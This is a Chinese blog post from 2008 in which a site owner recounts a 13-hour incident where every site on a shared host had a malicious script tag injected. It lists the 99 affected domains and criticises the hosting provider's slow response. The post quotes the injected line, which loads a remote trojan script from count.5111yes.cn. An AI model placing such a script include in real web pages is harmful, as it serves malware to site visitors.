2008.4.6反攻13小时
昨天晚上打开站点(首页),速度出奇地慢(后来打开FTP速度也是慢的出奇),杀毒软件(卡巴斯基)WEB反病毒报告跳出来告诉我有木马程序。仔细检查发现在页面顶部被植入这样一段代码:<script src=http://count.5111yes.cn/count/js/1.js></script>。而且网站内部所有页面都被植入这样的代码!
对于类似的问题我已经遇到好几次了,已经是见怪不怪了。经验告诉我这种情况的发生很大程度上是网站所在的服务器(虚拟主机)安全性存在漏洞被攻击的结果。
针对这样的情况一般的解决办法是直接用备份的文件将这些页面覆盖一次就可以了;这次不然,当我把备份文件上传上来覆盖好原有的文件后,在打开这些页面是发现页面立马又被植入了上面的代码!重复这样的动作好几次结果依然如此。
我不由地检查提供给我虚拟主机的Z-HOST(本站一个月前转入到Z-HOST的,所在虚拟主机IP为222.73.236.32),当我打开页面http://222.73.236.32的时候,WEB反病毒报告又出来了,查看其页面源文件发现该页面也不幸中招了!而且,本人随机打开本站所在主机上的99个网站中的一些站点发现这些站点无一幸免地被植入了上面的恶意代码…这真是一件很郁闷的事情,影响实在是“很坏,很糟糕!”。
本来更换空间到Z-HOST是因为有人说这里服务不错安全也好才做出这样的决定的——前边所在的火山互联的服务实在太差了,空间经常被攻击。但是万没有想到的是,刚刚转入Z-HOST不久,这里的服务器也遭受了同样的命运。当然,也不能就此说明空间提供商的服务不好,以前在统计服务中非常出色的51.LA也被攻击得都很无奈了。有句话叫“久病成医”,现在的51.LA在安全防范方面比以前要好得多了,而不争气的火山互联叫我失望了多次无法看到希望只好放弃走人,我不希望Z-HOST也叫我失望!
下面列出222.73.236.32上所有网站的域名,与这些兄弟姐妹大叔大妈们一起祈祷。希望主机提供商在安全方面争口气做好防范,让大家放心!
—————————————————————
99 found with the IP 222.73.236.32:
1) icbcc.net
2) ooboox.cn
3) blog.haifol.com
4) mutouren.net
5) haifol.com
6) pillowhome.cn
7) mov0728.com
52chichi.com
9) faruier-shop.cn
10) 12ui.cn
11) 3rbags.sh32.365dns.net
12) 52xiaoxi.name
13) 5588v.cn
14) 55you.com
15) 70sky.cn
16) 88853.com
17) 92zuowen.cn
18) abc515.cn
19) achisky.com.cn
20) ahqueer.cn
21) aixinni.cn
22) amazon-joyo.org
23) autoairfreshener.com.cn
24) bangdd.com
25) blog.buzz.net.cn
26) blog.jiespace.cn
27) blog.lifeboke.cn
28) blog.qinrm.com
29) bluemaples.cn
30) bt.haifol.com
31) buzz.net.cn
32) cctea.com
33) cetcq.cn
34) chejia.name
35) chenyg.cn ——本站域名
36) chinapubook.cn
37) cnit128.com
38) cnsattv.cn
39) cokar.com
40) com999.cn
41) dong21.com
42) facechat.cn
43) gidot.cn
44) google-earth-fans.org
45) hackdying.vicp.net
46) hackmvp.com
47) hacksw.cn
48) happyhack.cn
49) home365.net.cn
50) honey-stone.com
51) huanjue.net
52) idealandreal.com
53) iiidesign.cn
54) imbullfrog.com
55) jin.ngsee.com
56) jt18c.cn
57) kogoo.org
58) kweikwei.com
59) lifeboke.cn
60) live1000.cn
61) mamazx.com
62) mngod.cn
63) myhome5.cn
64) nfirefox.com.cn
65) nmlw.cn
66) o1st.com
67) oui-naozumi.name
68) pczilla.net
69) qqjinghua.cn
70) qxprint.com
71) ruzhe.com
72) sageit.cn
73) scolors.cn
74) senye.com
75) shishang-qiyi.org.cn
76) shoopay.com
77) soft-blog.cn
78) suipai.net
79) svl.cc
80) tengfeisoft.com
81) thod.cn
82) tzpos.com
83) vip.hackmvp.com
84) wabird.cn
85) wanjinyu.com
86) xdiary.cn
87) xiaododo.com.cn
88) xqsheng.cn
89) xuejiu.com
90) xunw.cn
91) xyhc.net.cn
92) yalukang.com
93) yishujiayuan.com
94) youjiangqu.cn
95) yuwave.cn
96) yzm.cc
97) zhangyiming.com
98) zx38.cn
99) zzmku.cn
——————————————————
附(整个事件始末):
- 之前使用火山互联主机,性能太差;小一、washun等反应Z-host(其实是迈腾主机)服务不错于是转移阵地至此;
- 昨晚十一点五十左右本人打开站点,发现中招;用备份文件覆盖多次未能如愿;查看所在主机上用户,发现无一幸免,知晓此事是由于(迈腾)主机遭受攻击所致;
- 到论坛反映情况,发现Z-HOST主机服务板块不能发帖,同时考虑主机提供商可能会很快解决问题,这事暂且搁置;
- 今天早上9点多打开站点发现依然如故。到论坛反映实情,点击这里查看,迅速有人跟帖声讨此事;之后又在Z-Blogger群(45392342)掀起热烈讨论;本人同时联系客服。
- 很糟糕,当时客服无人,24H电话无人接管,邮件发过去接到“邮件投递错误”通知,告知“帐号不存在”;
- 好容易联系到客服,回复“正在弄”,然后再无音讯;
- 论坛、群用户继续讨论,反应出其中的很多问题,此处就不列举出来了;
- 直到十一点半左右,问题才得以解决。整个事件持续13小时。
之所以反应出来,是因为“哀其不幸,怒其不争”,逃避和庇护只能使问题更加严重,最好的解决办法是即使反映问题和更及时地处理问题!希望迈腾以此为戒,努力地、热心地、更好地为大家服务!
这事件给人的教训是:做网站一定要选择好主机服务,同时要做好安全防范养成勤备份的习惯!
